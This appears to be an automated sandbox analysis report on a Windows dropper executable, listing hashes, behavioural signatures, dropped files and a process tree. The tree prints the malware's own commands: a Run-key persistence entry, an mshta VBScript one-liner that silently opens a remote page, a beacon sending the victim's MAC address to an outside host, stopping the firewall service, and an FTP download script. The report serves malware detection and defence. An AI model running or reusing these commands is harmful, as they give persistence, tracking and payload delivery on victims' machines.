Analysis

  • max time kernel
    134s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/07/2024, 07:54

General

  • Target

    1a82a2e23fd59812ec40714b642513ae_JaffaCakes118.exe

  • Size

    5KB

  • MD5

    1a82a2e23fd59812ec40714b642513ae

  • SHA1

    ad7386aaf24b7a13b13b9f9e31971e8d351ddc63

  • SHA256

    90b374df6f4c9aaa154725e22e6911f0287a635b86efe279f61e1054ae1f974c

  • SHA512

    a8dd64cbf625a8ea8b0270b02fdc2e983eea2436d8a8ff7ed37359514c9921879fbe374c46661eeb5341dd6b9195b15226b8c393420092e3b72d50da680a0ae0

  • SSDEEP

    48:iOXBtySKJxZcZ+AZmaw3R0ochuZeY+Gxc8Ajjimfn07iQB6TcEXKjYMSSeJY8JTn:NfycZ+AWOochIB9VAqmvcyIEXe0eHFe

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://www.html520.cn/d002/yahooo.htm%22,0%29%28window.close%29

Signatures

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1a82a2e23fd59812ec40714b642513ae_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\1a82a2e23fd59812ec40714b642513ae_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3748
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\240594765.bat
      2⤵
      • Checks computer location settings
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\SysWOW64\reg.exe
        reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v pop /t REG_SZ /d C:\Windows\help\runauto.vbs /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:2380
      • C:\Windows\SysWOW64\regedit.exe
        Regedit /s tem.reg
        3⤵
        • Modifies registry class
        • Runs .reg file with regedit
        PID:4296
      • C:\Windows\SysWOW64\regedit.exe
        Regedit /s gai.reg
        3⤵
        • Runs .reg file with regedit
        PID:3276
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ipconfig /all|findstr /c:"Physical Address"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4468
        • C:\Windows\SysWOW64\ipconfig.exe
          ipconfig /all
          4⤵
          • Gathers network information
          PID:3488
        • C:\Windows\SysWOW64\findstr.exe
          findstr /c:"Physical Address"
          4⤵
            PID:3736
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Windows\help\r.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4644
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://www.html520.cn/d002/count.asp?mac= EA:96:62:8E:18:C9&os=Windows_NT&ver=20090917
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1272
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1272 CREDAT:17410 /prefetch:2
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2816
        • C:\Windows\SysWOW64\mshta.exe
          mshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://www.html520.cn/d002/yahooo.htm",0)(window.close)
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4808
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://www.html520.cn/d002/yahooo.htm
            4⤵
            • Modifies Internet Explorer settings
            PID:2360
        • C:\Windows\SysWOW64\net.exe
          net stop sharedaccess
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1608
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop sharedaccess
            4⤵
              PID:4368
          • C:\Windows\SysWOW64\ftp.exe
            ftp -s:C:\Windows\temp\DownFtp.tmp
            3⤵
              PID:2824

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

                Filesize

                471B

                MD5

                4002e8b12817dfbab01588c4f44e6ee3

                SHA1

                cd4af5e44b05b1af7218bc8b2a002f471c480fa6

                SHA256

                cc39772f0b25c3383b5f2e37ff9b29bdbc27193366d8d6422a8f0b81801d6ab9

                SHA512

                b42ef3ac0dddb2563e6c4d5d49042d9da7a5f03718cbcc59d2025b842efd0b64fda490571459fdcfb49acc0b80f15edee68a510598fe60b0ae9151c01c615404

              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

                Filesize

                404B

                MD5

                285f0b875c99582eefe3b6f97b43d4da

                SHA1

                4cafadf247c9e3c4645491b7ecf297d905d5c35e

                SHA256

                e8f8fed1e27ab8cd2ab3f04b7b81ec39eb5d69ce62bb69e9a99fa3ea9c42ed5f

                SHA512

                dcec2993ffbcebcd98de427404100eaefafc81ab3c32e8ba5138c5a6e61e4dbaa0c52ad56b490ca2eb5095ee878ab1dd3077ea001e3ecde00c817625c9d688e5

              • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verA8F2.tmp

                Filesize

                15KB

                MD5

                1a545d0052b581fbb2ab4c52133846bc

                SHA1

                62f3266a9b9925cd6d98658b92adec673cbe3dd3

                SHA256

                557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1

                SHA512

                bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZRDQ3WBJ\suggestions[1].en-US

                Filesize

                17KB

                MD5

                5a34cb996293fde2cb7a4ac89587393a

                SHA1

                3c96c993500690d1a77873cd62bc639b3a10653f

                SHA256

                c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

                SHA512

                e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

              • C:\Users\Admin\AppData\Local\Temp\240594765.bat

                Filesize

                6KB

                MD5

                b52ad45c6953ce9334130f6c43f67672

                SHA1

                04c1de8bcb915f4de344525356a8e0f35f831d6d

                SHA256

                70f4404c7d493276581d5eec55445538992dcfd2beebd6f5f14c9ce9ee9a2828

                SHA512

                be72a4121b1e433100ba2d649f3232841d4c256a0eaceb773ad45d72f3a09c6d1c5aaf2d7a5cf6cf3beec151569a912f4700a497bda33e822dd2744906067542

              • C:\Users\Admin\AppData\Local\Temp\gai.reg

                Filesize

                309B

                MD5

                8c9d7b6c427f4978944db6dcdf2905be

                SHA1

                8fb3eb9e98895a774fdd4f043205a2d7abf75ccd

                SHA256

                b70851b5596fc38203915b7803d6e6b96e2bfc4a99f7181418dc489bf4b290de

                SHA512

                8cfaa804ad8e58c8394d19d9a28b07e81c4ac52d2aaabb1eb1b16a97b6d52a4cda204f0d23557e83f9a1bfd906dec42d9cd8a88433cedd69e833ee9767508897

              • C:\Users\Admin\AppData\Local\Temp\tem.reg

                Filesize

                221B

                MD5

                22a029e2aec1c742e95832fcedae8d5d

                SHA1

                6a823850f8bbaa10917aabfd6d8925781aac70a6

                SHA256

                669c0291fd71f63f88b766ae9a0fda782f4b3055909b0298aaec97a674d44bd8

                SHA512

                1a7a1bcf36bff8842d03f53de7eb50e874b186ef110919ed8ceddc5117c5177e2101427133b87afb679d08934b1f591afa7a55eafe0fe89cbf05f963f89a7b8d

              • C:\Users\Admin\Favorites\115┐ß╡╝║╜ ╔╧═°╛═╔╧115┐ß╡╝║╜.url

                Filesize

                131B

                MD5

                de355dc43eebcd04f5c170b5c224145e

                SHA1

                9d02d0a1e4c29ea0e8078c6fcfb2007a885baac1

                SHA256

                fe2510b5fa7ee798eae31e486f7480c358d1c7ffe9cd0cb44ae8914a9da4c087

                SHA512

                5626c7ec7f089c884b848c225b78d2088201658c7d197fdc0c973254283f097a35dbe61b6da5079726597f7754bb65f6e4bd6b77faba55a1118ee2766276208d

              • C:\Windows\help\r.vbs

                Filesize

                136B

                MD5

                0a6d8d754250fe09ad501b0e59b6198f

                SHA1

                741ae97de976ad3eae5ab2cc686e456bc99f5db3

                SHA256

                8080644a375bef2bd00d2bddcda50ef4ab38ca659f49eda650e955c6b660bdd9

                SHA512

                c89e5d726bbc4f144a5ec7a123421f91d342769d1491bc8e4ea4d365201eef20866bede80f1eda29097b8abcfec6b930cf694f66a2efb1c108b53ac298ad1491

              • C:\Windows\temp\DownFtp.tmp

                Filesize

                279B

                MD5

                3bacb412a3c9b5d5070c7cdf08d58889

                SHA1

                e2ea2de79c6abd89249dee0775596d92dcb57f82

                SHA256

                ec94b9ff0393e0fc49a9a85370d552d2e6b49017baa26b768350489925001e12

                SHA512

                31224dd29f66ad17d348bfdf7d12145f5202e461494a37458975bc61ab1825569b183ebc0173d2a512bcb17e1c6bf7de33e707fd42a0226f4037e7ff2227d023

              • memory/3748-0-0x0000000000400000-0x0000000000407000-memory.dmp

                Filesize

                28KB

              • memory/3748-83-0x0000000000400000-0x0000000000407000-memory.dmp

                Filesize

                28KB